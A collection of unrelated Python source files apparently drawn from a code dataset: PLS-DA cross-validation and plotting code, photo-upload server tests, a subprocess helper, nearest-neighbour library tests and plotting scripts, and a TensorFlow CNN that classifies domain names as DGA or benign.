test_accuracy = metrics.accuracy_score(ytest, y_pred)
test_precision = metrics.precision_score(ytest, y_pred)
test_recall = metrics.recall_score(ytest, y_pred)
test_f1_score = metrics.f1_score(ytest, y_pred)
test_zero_oneloss = metrics.zero_one_loss(ytest, y_pred)
test_matthews_mcc = metrics.matthews_corrcoef(ytest, y_pred)
test_roc_curve = metrics.roc_curve(ytest, class_score.ravel())
# Interpolated ROC curve and AUC
tpr = test_roc_curve[1]
fpr = test_roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
test_roc_curve = (fpr_grid, interpolated_tpr, test_roc_curve[2])
test_auc_area = metrics.auc(fpr_grid, interpolated_tpr)
else:
test_accuracy = metrics.accuracy_score(ytest, y_pred)
test_precision = metrics.precision_score(ytest, y_pred, average='weighted')
test_recall = metrics.recall_score(ytest, y_pred, average='weighted')
test_f1_score = metrics.f1_score(ytest, y_pred, average='weighted')
test_zero_oneloss = metrics.zero_one_loss(ytest, y_pred)
test_matthews_mcc = np.nan
test_roc_curve = list()
test_auc_area = list()
# Generate multiple ROC curves - one for each class the multiple class case
for predclass in range(cv_pipeline.n_classes):
roc_curve = metrics.roc_curve(ytest, class_score[:, predclass], pos_label=predclass)
# Interpolate all ROC curves to a finite grid
# Makes it easier to average and compare multiple models - with CV in mind
tpr = roc_curve[1]
fpr = roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
test_roc_curve.append(fpr_grid, interpolated_tpr, roc_curve[2])
test_auc_area.append(metrics.auc(fpr_grid, interpolated_tpr))
# TODO check the roc curve in train and test set
# Check the actual indexes in the original samples
test_misclassified_samples = test[np.where(ytest.ravel() != y_pred.ravel())[0]]
test_classpredictions = [*zip(test, y_pred)]
test_conf_matrix = metrics.confusion_matrix(ytest, y_pred)
# Test metrics
cv_testaccuracy[cvround] = test_accuracy
cv_testprecision[cvround] = test_precision
cv_testrecall[cvround] = test_recall
cv_testauc[cvround, :] = test_auc_area
cv_testf1[cvround] = test_f1_score
cv_testmatthews_mcc[cvround] = test_matthews_mcc
cv_testzerooneloss[cvround] = test_zero_oneloss
# Check this indexes, same as CV scores
cv_testmisclassifiedsamples.append(test_misclassified_samples)
cv_testroc_curve.append(test_roc_curve)
cv_testconfusionmatrix.append(test_conf_matrix)
cv_testclasspredictions.append(test_classpredictions)
# Do a proper investigation on how to get CV scores decently
# Align model parameters to account for sign indeterminacy.
# The criteria here used is to select the sign that gives a more similar profile (by L1 distance) to the loadings from
# on the model fitted with the whole data. Any other parameter can be used, but since the loadings in X capture
# the covariance structure in the X data block, in theory they should have more pronounced features even in cases of
# null X-Y association, making the sign flip more resilient.
for cvround in range(0, ncvrounds):
for currload in range(0, self.ncomps):
# evaluate based on loadings _p
choice = np.argmin(
np.array([np.sum(np.abs(self.loadings_p[:, currload] - cv_loadings_p[cvround, :, currload])),
np.sum(np.abs(
self.loadings_p[:, currload] - cv_loadings_p[cvround, :, currload] * -1))]))
if choice == 1:
cv_loadings_p[cvround, :, currload] = -1 * cv_loadings_p[cvround, :, currload]
cv_loadings_q[cvround, :, currload] = -1 * cv_loadings_q[cvround, :, currload]
cv_weights_w[cvround, :, currload] = -1 * cv_weights_w[cvround, :, currload]
cv_weights_c[cvround, :, currload] = -1 * cv_weights_c[cvround, :, currload]
cv_rotations_ws[cvround, :, currload] = -1 * cv_rotations_ws[cvround, :, currload]
cv_rotations_cs[cvround, :, currload] = -1 * cv_rotations_cs[cvround, :, currload]
cv_train_scores_t.append([*zip(train, -1 * cv_pipeline.scores_t)])
cv_train_scores_u.append([*zip(train, -1 * cv_pipeline.scores_u)])
cv_test_scores_t.append([*zip(test, -1 * cv_pipeline.scores_t)])
cv_test_scores_u.append([*zip(test, -1 * cv_pipeline.scores_u)])
else:
cv_train_scores_t.append([*zip(train, cv_pipeline.scores_t)])
cv_train_scores_u.append([*zip(train, cv_pipeline.scores_u)])
cv_test_scores_t.append([*zip(test, cv_pipeline.scores_t)])
cv_test_scores_u.append([*zip(test, cv_pipeline.scores_u)])
# Calculate Q-squareds
q_squaredy = 1 - (pressy / ssy)
q_squaredx = 1 - (pressx / ssx)
# Store everything...
self.cvParameters = {'PLS': {'Q2X': q_squaredx, 'Q2Y': q_squaredy,
'MeanR2X_Training': np.mean(R2X_training),
'MeanR2Y_Training': np.mean(R2Y_training),
'StdevR2X_Training': np.std(R2X_training),
'StdevR2Y_Training': np.std(R2X_training),
'MeanR2X_Test': np.mean(R2X_test),
'MeanR2Y_Test': np.mean(R2Y_test),
'StdevR2X_Test': np.std(R2X_test),
'StdevR2Y_Test': np.std(R2Y_test)}, 'DA': {}}
# Means and standard deviations...
self.cvParameters['PLS']['Mean_Loadings_q'] = cv_loadings_q.mean(0)
self.cvParameters['PLS']['Stdev_Loadings_q'] = cv_loadings_q.std(0)
self.cvParameters['PLS']['Mean_Loadings_p'] = cv_loadings_p.mean(0)
self.cvParameters['PLS']['Stdev_Loadings_p'] = cv_loadings_q.std(0)
self.cvParameters['PLS']['Mean_Weights_c'] = cv_weights_c.mean(0)
self.cvParameters['PLS']['Stdev_Weights_c'] = cv_weights_c.std(0)
self.cvParameters['PLS']['Mean_Weights_w'] = cv_weights_w.mean(0)
self.cvParameters['PLS']['Stdev_Weights_w'] = cv_weights_w.std(0)
self.cvParameters['PLS']['Mean_Rotations_ws'] = cv_rotations_ws.mean(0)
self.cvParameters['PLS']['Stdev_Rotations_ws'] = cv_rotations_ws.std(0)
self.cvParameters['PLS']['Mean_Rotations_cs'] = cv_rotations_cs.mean(0)
self.cvParameters['PLS']['Stdev_Rotations_cs'] = cv_rotations_cs.std(0)
self.cvParameters['PLS']['Mean_Beta'] = cv_betacoefs.mean(0)
self.cvParameters['PLS']['Stdev_Beta'] = cv_betacoefs.std(0)
self.cvParameters['PLS']['Mean_VIP'] = cv_vipsw.mean(0)
self.cvParameters['PLS']['Stdev_VIP'] = cv_vipsw.std(0)
self.cvParameters['DA']['Mean_MCC'] = cv_testmatthews_mcc.mean(0)
self.cvParameters['DA']['Stdev_MCC'] = cv_testmatthews_mcc.std(0)
self.cvParameters['DA']['Mean_Recall'] = cv_testrecall.mean(0)
self.cvParameters['DA']['Stdev_Recall'] = cv_testrecall.std(0)
self.cvParameters['DA']['Mean_Precision'] = cv_testprecision.mean(0)
self.cvParameters['DA']['Stdev_Precision'] = cv_testprecision.std(0)
self.cvParameters['DA']['Mean_Accuracy'] = cv_testaccuracy.mean(0)
self.cvParameters['DA']['Stdev_Accuracy'] = cv_testaccuracy.std(0)
self.cvParameters['DA']['Mean_f1'] = cv_testf1.mean(0)
self.cvParameters['DA']['Stdev_f1'] = cv_testf1.std(0)
self.cvParameters['DA']['Mean_0-1Loss'] = cv_testzerooneloss.mean(0)
self.cvParameters['DA']['Stdev_0-1Loss'] = cv_testzerooneloss.std(0)
self.cvParameters['DA']['Mean_AUC'] = cv_testauc.mean(0)
self.cvParameters['DA']['Stdev_AUC'] = cv_testauc.std(0)
self.cvParameters['DA']['Mean_ROC'] = np.mean(np.array([x[1] for x in cv_testroc_curve]), axis=0)
self.cvParameters['DA']['Stdev_ROC'] = np.std(np.array([x[1] for x in cv_testroc_curve]), axis=0)
# TODO add cv scores averaging and stdev properly
# Means and standard deviations...
# self.cvParameters['Mean_Scores_t'] = cv_scores_t.mean(0)
# self.cvParameters['Stdev_Scores_t'] = cv_scores_t.std(0)
# self.cvParameters['Mean_Scores_u'] = cv_scores_u.mean(0)
# self.cvParameters['Stdev_Scores_u'] = cv_scores_u.std(0)
# Save everything found during CV
if outputdist is True:
self.cvParameters['PLS']['CVR2X_Training'] = R2X_training
self.cvParameters['PLS']['CVR2Y_Training'] = R2Y_training
self.cvParameters['PLS']['CVR2X_Test'] = R2X_test
self.cvParameters['PLS']['CVR2Y_Test'] = R2Y_test
self.cvParameters['PLS']['CV_Loadings_q'] = cv_loadings_q
self.cvParameters['PLS']['CV_Loadings_p'] = cv_loadings_p
self.cvParameters['PLS']['CV_Weights_c'] = cv_weights_c
self.cvParameters['PLS']['CV_Weights_w'] = cv_weights_w
self.cvParameters['PLS']['CV_Rotations_ws'] = cv_rotations_ws
self.cvParameters['PLS']['CV_Rotations_cs'] = cv_rotations_cs
self.cvParameters['PLS']['CV_TestScores_t'] = cv_test_scores_t
self.cvParameters['PLS']['CV_TestScores_u'] = cv_test_scores_u
self.cvParameters['PLS']['CV_TrainScores_t'] = cv_train_scores_t
self.cvParameters['PLS']['CV_TrainScores_u'] = cv_train_scores_u
self.cvParameters['PLS']['CV_Beta'] = cv_betacoefs
self.cvParameters['PLS']['CV_VIPw'] = cv_vipsw
# CV Test set metrics - The metrics which matter to benchmark classifier
self.cvParameters['DA']['CV_TestMCC'] = cv_testmatthews_mcc
self.cvParameters['DA']['CV_TestRecall'] = cv_testrecall
self.cvParameters['DA']['CV_TestPrecision'] = cv_testprecision
self.cvParameters['DA']['CV_TestAccuracy'] = cv_testaccuracy
self.cvParameters['DA']['CV_Testf1'] = cv_testf1
self.cvParameters['DA']['CV_Test0-1Loss'] = cv_testzerooneloss
self.cvParameters['DA']['CV_TestROC'] = cv_testroc_curve
self.cvParameters['DA']['CV_TestConfusionMatrix'] = cv_testconfusionmatrix
self.cvParameters['DA']['CV_TestSamplePrediction'] = cv_testclasspredictions
self.cvParameters['DA']['CV_TestMisclassifiedsamples'] = cv_testmisclassifiedsamples
self.cvParameters['DA']['CV_TestAUC'] = cv_testauc
# CV Train parameters - so we can keep a look on model performance in training set
self.cvParameters['DA']['CV_TrainMCC'] = cv_trainmatthews_mcc
self.cvParameters['DA']['CV_TrainRecall'] = cv_trainrecall
self.cvParameters['DA']['CV_TrainPrecision'] = cv_trainprecision
self.cvParameters['DA']['CV_TrainAccuracy'] = cv_trainaccuracy
self.cvParameters['DA']['CV_Trainf1'] = cv_trainf1
self.cvParameters['DA']['CV_Train0-1Loss'] = cv_trainzerooneloss
self.cvParameters['DA']['CV_TrainROC'] = cv_trainroc_curve
self.cvParameters['DA']['CV_TrainConfusionMatrix'] = cv_trainconfusionmatrix
self.cvParameters['DA']['CV_TrainSamplePrediction'] = cv_trainclasspredictions
self.cvParameters['DA']['CV_TrainMisclassifiedsamples'] = cv_trainmisclassifiedsamples
self.cvParameters['DA']['CV_TrainAUC'] = cv_trainauc
return None
except TypeError as terp:
raise terp
def VIP(self, mode='w', direction='y'):
"""
calculate the variable importance parameters to get the most important variable used by the model
:param mode: The type of model parameter to use in calculating the VIP. Default value is weights (w), and other acceptable arguments are p, ws, cs, c and q.
defaults to 'w'
:type mode: str
:param str direction: The data block to be used to calculated the model fit and regression sum of squares defaults to 'y'
:return numpy.ndarray VIP: The vector with the calculated VIP values.
:rtype: numpy.ndarray, shape [n_features]
:raise ValueError: If mode or direction is not a valid option.
:raise AttributeError: Calling method without a fitted model.
"""
try:
# Code not really adequate for each Y variable in the multi-Y case - SSy should be changed so
# that it is calculated for each y and not for the whole block
if self.isfitted is False:
raise AttributeError("Model is not fitted")
if mode not in ['w', 'p', 'ws', 'cs', 'c', 'q']:
raise ValueError("Invalid type of VIP coefficient")
if direction not in ['x', 'y']:
raise ValueError("direction must be x or y")
choices = {'w': self.weights_w, 'p': self.loadings_p, 'ws': self.rotations_ws, 'cs': self.rotations_cs,
'c': self.weights_c, 'q': self.loadings_q}
if direction == 'y':
ss_dir = 'SSYcomp'
else:
ss_dir = 'SSXcomp'
nvars = self.loadings_p.shape[0]
vipnum = np.zeros(nvars)
for comp in range(0, self.ncomps):
vipnum += (choices[mode][:, comp] ** 2) * (self.m_params['PLS'][ss_dir][comp])
vip = np.sqrt(vipnum * nvars / self.m_params['PLS'][ss_dir].sum())
return vip
except AttributeError as atter:
raise atter
except ValueError as verr:
raise verr
def permuation_test(x, y, nb_perm=20):
"""
this function is still in developpement
"""
return None
def inertia_barplot(self, x, y):
"""
interia plot to get the goodness of the fit R2 and the goodness of prediction Q2 with each number of componant
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
"""
Q2_scores = []
R2_scores = []
for i in range(1, self.ncomps + 1):
# scores = cross_validate(pls_binary , X = df, y = Y1 ,scoring=scoring , cv=7 , n_jobs=-1 verbose=2 , ,return_train_score=True , )
# create neww instance with diiferent number f componant
plsda = PyPLS_DA(i)
plsda.fit(x, y)
plsda.cross_validation(x, y)
R2_scores.append(plsda.m_params["PLS"]['R2Y'])
Q2_scores.append(plsda.cvParameters['PLS']['Q2Y'])
features = np.arange(len(Q2_scores))
plt.bar(features - 0.2, R2_scores, 0.4, label='R2')
plt.bar(features + 0.2, Q2_scores, 0.4, label='Q2')
plt.legend()
plt.title('interia plot')
def score_plot(self, y):
"""
PLS_DA sore plot gives the projection of the simples on the first 2 componants (latent variables )
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
"""
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
targets = np.unique(y)
colors = ['r', 'g']
for target, color in zip(targets, colors):
indicesToKeep = [x for x in np.arange(self.scores_t.shape[0]) if y[x] == target]
plt.scatter(self.scores_t[indicesToKeep, 0]
, self.scores_t[indicesToKeep, 1]
, c=color, label='class ' + str(target), s=100, edgecolors='k',
)
for i in range(self.scores_t.shape[0]):
plt.text(x=self.scores_t[i, 0] + 0.3, y=self.scores_t[i, 1] + 0.3, s=i + 1)
plt.xlabel('LV 1')
plt.ylabel('LV 2')
plt.legend()
plt.title('PLS-DA score plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
``` |
{
"source": "1Firsts/personfinder",
"score": 2
} |
#### File: tests/server_test_cases/photo_tests.py
```python
from google.appengine.api import images
from photo import MAX_IMAGE_DIMENSION
from server_tests_base import ServerTestsBase
class PhotoTests(ServerTestsBase):
"""Tests that verify photo upload and serving."""
def submit_create(self, **kwargs):
doc = self.go('/haiti/create?role=provide')
form = doc.cssselect_one('form')
return self.s.submit(form,
given_name='_test_given_name',
family_name='_test_family_name',
author_name='_test_author_name',
text='_test_text',
**kwargs)
def test_upload_photo(self):
"""Verifies a photo is uploaded and properly served on the server."""
# Create a new person record with a profile photo.
photo = file('tests/testdata/small_image.png')
original_image = images.Image(photo.read())
doc = self.submit_create(photo=photo)
# Verify the image is uploaded and displayed on the view page.
photo = doc.cssselect_one('img.photo')
photo_anchor = doc.xpath_one('//a[img[@class="photo"]]')
# Verify the image is served properly by checking the image metadata.
doc = self.s.go(photo.get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
# Follow the link on the image and verify the same image is served.
doc = self.s.follow(photo_anchor)
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
def test_upload_photos_with_transformation(self):
"""Uploads both profile photo and note photo and verifies the images are
properly transformed and served on the server i.e., jpg is converted to
png and a large image is resized to match MAX_IMAGE_DIMENSION."""
# Create a new person record with a profile photo and a note photo.
photo = file('tests/testdata/small_image.jpg')
note_photo = file('tests/testdata/large_image.png')
original_image = images.Image(photo.read())
doc = self.submit_create(photo=photo, note_photo=note_photo)
# Verify the images are uploaded and displayed on the view page.
photos = doc.cssselect('img.photo')
assert len(photos) == 2
# Verify the profile image is converted to png.
doc = self.s.go(photos[0].get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
# Verify the note image is resized to match MAX_IMAGE_DIMENSION.
doc = self.s.go(photos[1].get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == MAX_IMAGE_DIMENSION
assert image.height == MAX_IMAGE_DIMENSION
def test_upload_empty_photo(self):
"""Uploads an empty image and verifies no img tag in the view page."""
# Create a new person record with a zero-byte profile photo.
photo = file('tests/testdata/empty_image.png')
doc = self.submit_create(photo=photo)
# Verify there is no img tag in the view page.
assert '_test_given_name' in doc.text
assert not doc.cssselect('img.photo')
def test_upload_broken_photo(self):
"""Uploads a broken image and verifies an error message is displayed."""
# Create a new person record with a broken profile photo.
photo = file('tests/testdata/broken_image.png')
doc = self.submit_create(photo=photo)
# Verify an error message is displayed.
assert not doc.cssselect('img.photo')
assert 'unrecognized format' in doc.text
``` |
{
"source": "1fish2/borealis",
"score": 3
} |
#### File: borealis/util/filepath.py
```python
from __future__ import absolute_import, division, print_function
import errno
import logging
import os
import sys
if os.name == 'posix' and sys.version_info[0] < 3:
import subprocess32 as subprocess
else:
import subprocess
from typing import Optional, Sequence, Tuple
TIMEOUT = 60 # seconds
def makedirs(path, *paths):
# type: (str, *str) -> str
"""Join one or more path components, make that directory path (using the
default mode 0o0777), and return the joined path.
Raise OSError if it can't achieve the result (e.g. the containing directory
is readonly or the path contains a file); not if the directory already
exists.
"""
full_path = os.path.join(path, *paths)
try:
if full_path:
os.makedirs(full_path)
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(full_path):
raise
return full_path
def run_cmd2(tokens, trim=True, timeout=TIMEOUT):
# type: (Sequence[str], bool, Optional[int]) -> Tuple[str, str]
"""Run a shell command-line (in token list form) and return a tuple
containing its (stdout, stderr).
This does not expand filename patterns or environment variables or do other
shell processing steps.
Args:
tokens: The command line as a list of string tokens.
trim: Whether to trim off trailing whitespace. This is useful
because the outputs usually end with a newline.
timeout: timeout in seconds; None for no timeout.
Returns:
The command's stdout and stderr strings.
Raises:
OSError (e.g. FileNotFoundError [Python 3] or PermissionError),
subprocess.SubprocessError (TimeoutExpired or CalledProcessError)
"""
out = subprocess.run(
tokens,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
timeout=timeout)
if trim:
return out.stdout.rstrip(), out.stderr.rstrip()
return out.stdout, out.stderr
def run_cmd(tokens, trim=True, timeout=TIMEOUT):
# type: (Sequence[str], bool, Optional[int]) -> str
"""Run a shell command-line (in token list form) and return its stdout.
See run_cmd2().
"""
return run_cmd2(tokens, trim=trim, timeout=timeout)[0]
def run_cmdline(line, trim=True, timeout=TIMEOUT):
# type: (str, bool, Optional[int]) -> Optional[str]
"""Run a shell command-line string and return its output, or None if it
failed. This does not expand filename patterns or environment variables or
do other shell processing steps like quoting.
Args:
line: The command line as a string to split.
trim: Whether to trim off trailing whitespace. This is useful
because the subprocess output usually ends with a newline.
timeout: timeout in seconds; None for no timeout.
Returns:
The command's output string, or None if it couldn't even run.
"""
try:
return run_cmd(tokens=line.split(), trim=trim, timeout=timeout)
except (OSError, subprocess.SubprocessError) as _:
logging.exception('Failed to run command line: %s', line)
return None
``` |
{
"source": "1fish2/pyenv_test",
"score": 3
} |
#### File: 1fish2/pyenv_test/test_pip.py
```python
import unittest
import numpy as np
class TestPip(unittest.TestCase):
def test_case(self):
a = np.arange(5)
tot = a.sum()
self.assertEqual(tot, 10)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1flei/FALCONN",
"score": 2
} |
#### File: python/test/wrapper_test.py
```python
import _falconn as falconn
import numpy as np
def test_number_of_hash_functions():
params = falconn.LSHConstructionParameters()
params.lsh_family = falconn.LSHFamily.Hyperplane
params.dimension = 10
falconn.compute_number_of_hash_functions(5, params)
assert params.k == 5
params.lsh_family = falconn.LSHFamily.CrossPolytope
falconn.compute_number_of_hash_functions(5, params)
assert params.k == 1
assert params.last_cp_dimension == 16
params.dimension = 100
params.lsh_family = falconn.LSHFamily.Hyperplane
falconn.compute_number_of_hash_functions(8, params)
assert params.k == 8
params.lsh_family = falconn.LSHFamily.CrossPolytope
falconn.compute_number_of_hash_functions(8, params)
assert params.k == 1
assert params.last_cp_dimension == 128
falconn.compute_number_of_hash_functions(10, params)
assert params.k == 2
assert params.last_cp_dimension == 2
def test_get_default_parameters():
n = 100000
dim = 128
dist_func = falconn.DistanceFunction.NegativeInnerProduct
params = falconn.get_default_parameters(n, dim, dist_func, True)
assert params.l == 10
assert params.lsh_family == falconn.LSHFamily.CrossPolytope
assert params.storage_hash_table == falconn.StorageHashTable.BitPackedFlatHashTable
assert params.num_setup_threads == 0
assert params.k == 2
assert params.dimension == dim
assert params.distance_function == dist_func
assert params.num_rotations == 1
assert params.last_cp_dimension == 64
``` |
{
"source": "1flei/lccs-lsh",
"score": 2
} |
#### File: scripts/lccs_plot/plot_single_method.py
```python
import os
import re
import numpy as np
import matplotlib.pylab as plt
from scipy.spatial import ConvexHull
from itertools import chain, product
from scipy.interpolate import interp1d
from collections import defaultdict
from plot_sigmod import parse_res
def get_c(res):
return int(res[0][0])
def get_time(res):
return float(res[1][2])
def get_recall(res):
return float(res[1][3])
def get_params(res):
return (res[0][0], ) + tuple(res[0][1].items())
def plot_records(filename):
data_dict = defaultdict(list)
for record in parse_res(filename):
params = get_params(record)
print('record=', record)
param_key = params[1]
print('param_key=', params)
c = get_c(record)
t = get_time(record)
recall = get_recall(record)
data_dict[param_key] += [[c, t, recall]]
#use marker to encode p
#use color to encode l
marker_p = {
0 : 'o',
0.5: 'x',
1 : 's',
2 : '^',
4 : 'd',
8 : '*',
# 16: '*',
}
ls = [8, 16, 32, 64, 128, 256, 512]
markers = ['o','x','s','^','d','*', 'p']
# ls = [128]
# colors = [np.random.rand(3, ) for l in ls]
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'tab:blue', 'tab:orange', 'tab:purple', 'tab:pink', 'tab:brown', 'tab:gray']
#let color be random colors
for (param_key, data_arr), (marker, color) in zip(data_dict.items(), product(markers, colors)):
data_lp = np.array(data_arr)
# print(marker, color, param_key, data_lp)
plt.semilogy(data_lp[:, -1], data_lp[:, -2], marker=marker, label=str(param_key), color=color, markerfacecolor='none')
plt.xlim(0, 100)
plt.legend(ncol=6)
plt.show()
# color_ls = [random.randin]
#scheme : L, nprobe, ncheck, time, recall
# filename = 'results/Sift_srs_[02-17_13_15].out'
# filename = 'results/Sift_c2lsh_[10-16_11_19].out'
# filename = 'results/deep_qalsh_[02-18_09_52].out'
filename = 'results/Gist_mp_lccs_[10-15_04_55].out'
plot_records(filename)
```
#### File: lccs-lsh/scripts/to_binary.py
```python
import csv
import struct
import numpy as np
def to_binary(dataset_name):
inDataFilename = '../data/%s/%s.ds'%(dataset_name, dataset_name)
inQueryFilename = '../data/%s/%s.q'%(dataset_name, dataset_name)
outDataFilename = '../data/%s/%s.dsb'%(dataset_name, dataset_name)
outQueryFilename = '../data/%s/%s.qb'%(dataset_name, dataset_name)
print(dataset_name)
with open(inDataFilename, 'r') as fin, open(outDataFilename, 'wb') as fout:
reader = csv.reader(fin, delimiter=' ')
for row in reader:
# print(row)
x = [float(ri) for ri in row[1:] if ri!='' ]
fout.write(struct.pack('f'*len(x), *x))
with open(inQueryFilename, 'r') as fin, open(outQueryFilename, 'wb') as fout:
reader = csv.reader(fin, delimiter=' ')
for row in reader:
# print(row)
x = [float(ri) for ri in row[1:] if ri!='' ]
fout.write(struct.pack('f'*len(x), *x))
# to_binary('Mnist')
to_binary('Sift')
# to_binary('Gist')
# to_binary('Mnist784')
# to_binary('glove')
# to_binary('Trevi')
``` |
{
"source": "1flurry/Xiaoyu.github.io",
"score": 2
} |
#### File: AIE/tensorflow/cnn.py
```python
import os
import sys
import time
from datetime import timedelta
import numpy as np
import tensorflow as tf
import sklearn
from sklearn.cross_validation import train_test_split
from sklearn import metrics
import tldextract
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import graph_util
'''数据预处理'''
def pad(dat, length=31, item=0):
if len(dat)>length:
dat=dat[0:length]
else:
dat.extend((length-len(dat))*[item])
return dat
def domain2list(domain):
diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}
data=[diction.get(x,38) for x in domain]
return pad(data)
def makeData(black="./data/dga.txt",white="./data/top-1m.csv"):
X = []
Y = []
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
with open(black,'r') as f:
data=f.readlines()
for i in data:
X.append(domain2list(no_fetch_extract(i.strip()).domain))
Y.append([0])
with open("./data/top-1m.csv",'r') as f:
data=f.readlines()
for i in data:
X.append(domain2list(no_fetch_extract(i.strip().split(',')[1]).domain))
Y.append([1])
X=np.mat(X)
Y=np.mat(Y)
return X,Y
def batch_iter(x, y, batch_size=512):
"""生成批次数据"""
data_len = len(x)
num_batch = int((data_len - 1) / batch_size) + 1
indices = np.random.permutation(np.arange(data_len))
x_shuffle = x[indices]
y_shuffle = y[indices]
for i in range(num_batch):
start_id = i * batch_size
end_id = min((i + 1) * batch_size, data_len)
yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]
'''获取已使用时间'''
def get_time_dif(start_time):
end_time = time.time()
time_dif = end_time - start_time
return timedelta(seconds=int(round(time_dif)))
'''评估在某一数据上的准确率和损失'''
def evaluate(sess, x_, y_,loss,acc):
data_len = len(x_)
batch_eval = batch_iter(x_, y_, batch_size)
total_loss = 0.0
total_acc = 0.0
loss = tf.reduce_mean(cross_entropy)
for x_batch, y_batch in batch_eval:
batch_len = len(x_batch)
loss_n, acc_n = sess.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: 0.25})
total_loss += loss_n * batch_len
total_acc += acc_n * batch_len
return total_loss / data_len, total_acc / data_len
if __name__ == '__main__':
'''模型参数'''
embedding_dim = 4 # 词向量维度
seq_length = 31 # 序列长度
num_classes = 1 # 类别数
num_filters = 20 # 卷积维度
kernel_size = 3 # 卷积核尺寸
vocab_size = 39 # 词汇表达小
dropout_keep_prob = 0.75 # dropout保留比例
learning_rate = 0.001 # 学习率
batch_size = 1024 # 每批训练大小
num_epochs = 20 # 总迭代轮次
print_per_batch = 1000 # 每多少轮输出一次结果
save_per_batch = 1000 # 每多少轮存入tensorboard
output_graph_name = 'model.pb' # 保存模型文件名
output_fld = '/model/' # 保存路径
'''载入训练集与验证集'''
print("Loading training and validation data...")
X,Y=makeData()
#vocab_size = len(X)
x_train, x_val, y_train, y_val = train_test_split(X,Y,test_size=0.1)
print(x_train.shape)
print(y_train.shape)
print(x_val.shape)
print(y_val.shape)
del X,Y
'''建立模型'''
print('Configuring CNN model...')
# 待输入的数据
#with tf.Graph().as_default() as g:
input_x = tf.placeholder(tf.int32, [None, seq_length], name='input_x_')
input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y_')
keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')
#创建cnn模型
with tf.device('/cpu:0'):#强制在CPU上执行操作
embedding = tf.get_variable('embedding', [vocab_size, embedding_dim])
embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)
with tf.name_scope("cnn"):
conv_1 = tf.layers.conv1d(embedding_inputs, num_filters, kernel_size, name='conv_1')
maxp = tf.layers.max_pooling1d(conv_1, 2, 2)
conv_2 = tf.layers.conv1d(maxp, num_filters, kernel_size, name='conv_2')
maxp = tf.layers.max_pooling1d(conv_2, 2, 2)
flatten = tf.contrib.layers.flatten(maxp)
with tf.name_scope("score"):
# 全连接层,后面接dropout以及sigmoid激活
fc = tf.layers.dropout(flatten,0.25)
fc = tf.layers.dense(fc, 16, name='fc1')
fc = tf.layers.dense(fc, num_classes, name='fc2')
with tf.name_scope('output'):
#输出层
logits = tf.nn.sigmoid(fc, name='main_output')
with tf.name_scope("optimize"):
# 损失函数,交叉熵
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=input_y)
loss = tf.reduce_mean(cross_entropy)
# 优化器
optim = tf.train.RMSPropOptimizer(learning_rate=learning_rate).minimize(loss)
with tf.name_scope("accuracy"):
# 准确率
logits = tf.cast(logits, tf.int32)
y = tf.cast(input_y, tf.int32)
correct_pred = tf.equal(logits, y)
acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
tf.summary.scalar("loss", loss)
tf.summary.scalar("accuracy", acc)
merged_summary = tf.summary.merge_all()
'''创建session'''
session = tf.Session()
session.run(tf.global_variables_initializer())
'''训练模型'''
print('Training and evaluating...')
start_time = time.time()
total_batch = 0 # 总批次
best_acc_val = 0.0 # 最佳验证集准确率
last_improved = 0 # 记录上一次提升批次
require_improvement = 40000 # 如果超过40000轮未提升,提前结束训练
flag = False
for epoch in range(num_epochs):
print('Epoch:', epoch + 1)
batch_train = batch_iter(x_train, y_train, batch_size)
for x_batch, y_batch in batch_train:
#feed_dict = feed_data(x_batch, y_batch, 0.75)
feed_dict = {input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob}
if total_batch % print_per_batch == 0:
# 每多少轮次输出在训练集和验证集上的性能
loss_train, acc_train = session.run([loss, acc], feed_dict={input_x: x_batch,input_y: y_batch,keep_prob: dropout_keep_prob})
loss_val, acc_val = evaluate(session, x_val, y_val, loss, acc) # todo
time_dif = get_time_dif(start_time)
msg = 'Iter: {0:>6}, Train Loss: {1:}, Train Acc: {2:>7.2%},' \
+ ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5}'
print(msg.format(total_batch, loss_train, acc_train, loss_val, acc_val, time_dif))
session.run(optim, feed_dict=feed_dict) # 运行优化
total_batch += 1
if total_batch - last_improved > require_improvement:
# 验证集正确率长期不提升,提前结束训练
print("No optimization for a long time, auto-stopping...")
flag = True
break # 跳出循环
#session.run(tf.assign(learning_rate, 0.001 * (0.95 ** epoch)),float32)#逐步降低学习率
#learning_rate = session.run(lr)
if flag: # 同上
break
'''保存模型'''
if not os.path.exists(output_fld):
os.makedirs(output_fld)
